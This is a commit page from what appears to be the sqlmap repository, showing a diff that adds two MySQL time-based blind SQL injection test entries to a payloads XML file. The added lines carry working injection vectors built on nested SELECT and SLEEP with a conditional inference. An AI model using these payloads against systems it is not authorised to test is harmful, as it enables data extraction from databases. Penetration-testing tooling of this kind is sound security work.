Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 66c2a79

Browse files
bdamelebdamele
committed
added a time-based payload for MySQL when the simpler AND SLEEP(X) does not work
1 parent eecc0b9 commit 66c2a79

1 file changed

Lines changed: 41 additions & 0 deletions

File tree

xml/payloads.xml

Lines changed: 41 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -2454,6 +2454,47 @@ Formats:
24542454

24552455

24562456
<!-- AND time-based blind tests -->
2457+
<test>
2458+
<title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
2459+
<stype>5</stype>
2460+
<level>1</level>
2461+
<risk>1</risk>
2462+
<clause>1,2,3</clause>
2463+
<where>1</where>
2464+
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2465+
<request>
2466+
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2467+
</request>
2468+
<response>
2469+
<time>[SLEEPTIME]</time>
2470+
</response>
2471+
<details>
2472+
<dbms>MySQL</dbms>
2473+
<dbms_version>&gt; 5.0.11</dbms_version>
2474+
</details>
2475+
</test>
2476+
2477+
<test>
2478+
<title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
2479+
<stype>5</stype>
2480+
<level>4</level>
2481+
<risk>1</risk>
2482+
<clause>1,2,3</clause>
2483+
<where>1</where>
2484+
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2485+
<request>
2486+
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2487+
<comment>#</comment>
2488+
</request>
2489+
<response>
2490+
<time>[SLEEPTIME]</time>
2491+
</response>
2492+
<details>
2493+
<dbms>MySQL</dbms>
2494+
<dbms_version>&gt; 5.0.11</dbms_version>
2495+
</details>
2496+
</test>
2497+
24572498
<test>
24582499
<title>MySQL &gt; 5.0.11 AND time-based blind</title>
24592500
<stype>5</stype>

0 commit comments

Comments
 (0)